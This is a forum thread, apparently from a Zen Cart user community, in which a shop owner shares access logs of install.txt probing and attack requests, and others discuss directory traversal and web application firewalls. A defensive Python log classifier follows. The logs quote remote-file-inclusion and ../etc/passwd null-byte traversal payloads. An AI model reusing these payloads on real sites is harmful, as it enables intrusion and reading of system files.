Looking for targets for a new automated attack?


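Post by masatoshi » 2010/2/12 20:37

Recently, looking at my server logs, I have seen accesses like the following several times over the course of a few days.
Are they gathering statistics on usage or installations...?
Or is it preparation for an automated attack on a security hole...?
For the time being, I deleted the "install.txt" file, though.
Everyone, please be careful.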
------------------- log ------

58.177.209.216 - - [12/Feb/2010:18:22:53 +0900] "GET HTTP/1.1 HTTP/1.1" 400 348 "-" "Toata dragostea mea pentru diavola"
58.177.209.216 - - [12/Feb/2010:18:22:53 +0900] "GET /install.txt HTTP/1.1" 404 290 "-" "Toata dragostea mea pentru diavola"
58.177.209.216 - - [12/Feb/2010:18:22:54 +0900] "GET /cart/install.txt HTTP/1.1" 404 295 "-" "Toata dragostea mea pentru diavola"
58.177.209.216 - - [12/Feb/2010:18:22:54 +0900] "GET /zencart/install.txt HTTP/1.1" 404 298 "-" "Toata dragostea mea pentru diavola"
58.177.209.216 - - [12/Feb/2010:18:22:54 +0900] "GET /zen-cart/install.txt HTTP/1.1" 404 299 "-" "Toata dragostea mea pentru diavola"
58.177.209.216 - - [12/Feb/2010:18:22:54 +0900] "GET /zen/install.txt HTTP/1.1" 404 294 "-" "Toata dragostea mea pentru diavola"
58.177.209.216 - - [12/Feb/2010:18:22:54 +0900] "GET /shop/install.txt HTTP/1.1" 404 295 "-" "Toata dragostea mea pentru diavola"
58.177.209.216 - - [12/Feb/2010:18:22:54 +0900] "GET /butik/install.txt HTTP/1.1" 404 296 "-" "Toata dragostea mea pentru diavola"
58.177.209.216 - - [12/Feb/2010:18:22:55 +0900] "GET /zcart/install.txt HTTP/1.1" 404 296 "-" "Toata dragostea mea pentru diavola"
58.177.209.216 - - [12/Feb/2010:18:22:55 +0900] "GET /shop2/install.txt HTTP/1.1" 404 296 "-" "Toata dragostea mea pentru diavola"
58.177.209.216 - - [12/Feb/2010:18:22:55 +0900] "GET /catalog/install.txt HTTP/1.1" 404 298 "-" "Toata dragostea mea pentru diavola"
58.177.209.216 - - [12/Feb/2010:18:22:55 +0900] "GET /boutique/install.txt HTTP/1.1" 404 299 "-" "Toata dragostea mea pentru diavola"
58.177.209.216 - - [12/Feb/2010:18:22:55 +0900] "GET /cart/install.txt HTTP/1.1" 404 295 "-" "Toata dragostea mea pentru diavola"
58.177.209.216 - - [12/Feb/2010:18:22:55 +0900] "GET /store/install.txt HTTP/1.1" 404 296 "-" "Toata dragostea mea pentru diavola"

Re: Looking for targets for a new automated attack?

Post by kimono » 2010/2/12 20:59

Hello, kimono here :)

Thank you very much for the information ^^
I don't know what this is yet, but I'll delete it on our site too.

Re: Looking for targets for a new automated attack?

Post by masatoshi » 2010/2/24 20:12

This time, accesses like these...

-------------------

210.166.221.249 - - [24/Feb/2010:18:33:39 +0900] "GET /store/index.php?main_page=http://twdplus-international.com/a/onodin/s? HTTP/1.0" 200 28602 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:39 +0900] "GET /store/index.php?main_page=|w| HTTP/1.0" 200 28785 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:40 +0900] "GET /store/index.php?main_page=|w HTTP/1.0" 200 29196 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:40 +0900] "GET /store/index.php?main_page=w| HTTP/1.0" 200 28915 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:40 +0900] "GET /store/index.php?main_page=/etc/passwd HTTP/1.0" 200 29237 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:40 +0900] "GET /store/index.php?main_page=../etc/passwd HTTP/1.0" 200 28963 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:41 +0900] "GET /store/index.php?main_page=../../etc/passwd HTTP/1.0" 200 29248 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:41 +0900] "GET /store/index.php?main_page=../../../etc/passwd HTTP/1.0" 200 28859 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:41 +0900] "GET /store/index.php?main_page=../../../../etc/passwd HTTP/1.0" 200 28918 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:42 +0900] "GET /store/index.php?main_page=../../../../../etc/passwd HTTP/1.0" 200 29333 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:42 +0900] "GET /store/index.php?main_page=../../../../../../etc/passwd HTTP/1.0" 200 29488 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:42 +0900] "GET /store/index.php?main_page=../../../../../../../etc/passwd HTTP/1.0" 200 28862 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:42 +0900] "GET /store/index.php?main_page=../../../../../../../../etc/passwd HTTP/1.0" 200 29054 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:42 +0900] "GET /store/index.php?main_page=../../../../../../../../../etc/passwd HTTP/1.0" 200 28690 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:43 +0900] "GET /store/index.php?main_page=../../../../../../../../../../etc/passwd HTTP/1.0" 200 28625 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:43 +0900] "GET /store/index.php?main_page=../../../../../../../../../../../etc/passwd HTTP/1.0" 200 28799 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:43 +0900] "GET /store/index.php?main_page=../../../../../../../../../../../../etc/passwd HTTP/1.0" 200 29012 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:43 +0900] "GET /store/index.php?main_page=../../../../../../../../../../../../../etc/passwd HTTP/1.0" 200 29289 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:44 +0900] "GET /store/index.php?main_page=/etc/passwd%00 HTTP/1.0" 200 28695 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:44 +0900] "GET /store/index.php?main_page=../etc/passwd%00 HTTP/1.0" 200 28543 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:44 +0900] "GET /store/index.php?main_page=../../etc/passwd%00 HTTP/1.0" 200 29227 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:44 +0900] "GET /store/index.php?main_page=../../../etc/passwd%00 HTTP/1.0" 200 28829 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:45 +0900] "GET /store/index.php?main_page=../../../../etc/passwd%00 HTTP/1.0" 200 29131 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:45 +0900] "GET /store/index.php?main_page=../../../../../etc/passwd%00 HTTP/1.0" 200 28840 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:45 +0900] "GET /store/index.php?main_page=../../../../../../etc/passwd%00 HTTP/1.0" 200 29143 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:45 +0900] "GET /store/index.php?main_page=../../../../../../../etc/passwd%00 HTTP/1.0" 200 28480 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:46 +0900] "GET /store/index.php?main_page=../../../../../../../../etc/passwd%00 HTTP/1.0" 200 28544 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:46 +0900] "GET /store/index.php?main_page=../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 28774 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:46 +0900] "GET /store/index.php?main_page=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 28711 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:46 +0900] "GET /store/index.php?main_page=../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 28485 "-" "Mozilla/5.0"
210.166.221.249 - - [24/Feb/2010:18:33:46 +0900] "GET /store/index.php?main_page=../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 28715 "-" "Mozilla/5.0"

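Re: Looking for targets for a new automated attack?

Post by @電材 » 2010/2/25 21:56

That's scary.
Apparently it is called directory traversal. Googling it turns up plenty of information.

By the way, "Toata dragostea mea pentru diavola" apparently means "all my love for the devil".
Leaving a message like this in the UA seems almost stylish, but it is scary, isn't it.
It seems to be a technique called RoundCube.
Just a hobby site http://zairyo.ne.jp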

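Re: Looking for targets for a new automated attack?

Post by masatoshi » 2010/2/26 02:38

Yes... it's a real nuisance (^^;

And it scares me a little, too.

I wonder if someone will soon come up with a groundbreaking mechanism that promptly detects suspicious access on the server side and deals with it?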

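Re: Looking for targets for a new automated attack?

Post by @電材 » 2010/3/06 13:44

Detection on the web server side
I ended up at something called a web application firewall.
The cost of introducing one is probably considerable, too.

In theory there also seem to be ways to avoid this with exception handling and the like, but if the server itself gets taken over, that's out of the question.
We live in a world where even Google is left reeling by cyber attacks, so in a sense, you have to be prepared.
I'll think about what I can do to cause users as little trouble as possible (wry smile)
Just a hobby site http://zairyo.ne.jp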
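
As an added example that is not part of the original thread: a small Python classifier for Apache combined-format access logs that labels the request patterns quoted in the posts above (a malformed request line, install.txt probes, and remote-URL, ../ and %00 values in a query parameter). The label names, the helper functions and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" format: client, identd, user, [time], "request", status, size, "referer", "UA"
LINE_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" \d{3} \S+ "[^"]*" "[^"]*"')

def classify(req):
    """Return the set of probe labels that apply to one request line."""
    parts = req.split(" ")
    if len(parts) != 3 or not parts[1].startswith("/"):
        return {"malformed-request"}          # e.g. "GET HTTP/1.1 HTTP/1.1"
    url = urlsplit(parts[1])
    labels = set()
    if url.path.endswith("/install.txt"):
        labels.add("installer-file-probe")
    # parse_qsl percent-decodes values, so %00 arrives here as a real NUL byte
    for _name, value in parse_qsl(url.query, keep_blank_values=True):
        if re.match(r"(?i)(https?|ftp)://", value):
            labels.add("remote-include")
        if "../" in value or value.startswith("/etc/"):
            labels.add("path-traversal")
        if "\x00" in value:
            labels.add("null-byte")
    return labels

def summarize(lines):
    """Map each client address to {label: hit count}; clean clients are omitted."""
    report = defaultdict(lambda: defaultdict(int))
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            for label in classify(m["req"]):
                report[m["ip"]][label] += 1
    return {ip: dict(counts) for ip, counts in report.items()}

def _line(ip, req, status):  # builds a constructed sample line (documentation addresses)
    return f'{ip} - - [24/Feb/2010:18:33:39 +0900] "{req}" {status} 290 "-" "constructed-ua"'

SAMPLE = [  # constructed, modelled on the request shapes quoted in the thread
    _line("192.0.2.10", "GET HTTP/1.1 HTTP/1.1", 400),
    _line("192.0.2.10", "GET /install.txt HTTP/1.1", 404),
    _line("192.0.2.10", "GET /zencart/install.txt HTTP/1.1", 404),
    _line("198.51.100.7", "GET /store/index.php?main_page=http://example.com/s? HTTP/1.0", 200),
    _line("198.51.100.7", "GET /store/index.php?main_page=../../etc/passwd HTTP/1.0", 200),
    _line("198.51.100.7", "GET /store/index.php?main_page=../../../etc/passwd%00 HTTP/1.0", 200),
    _line("203.0.113.5", "GET /store/index.php?main_page=index HTTP/1.1", 200),
]
print(summarize(SAMPLE))
```

The labels describe only what was requested; a 200 status by itself does not show that a request had any effect.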
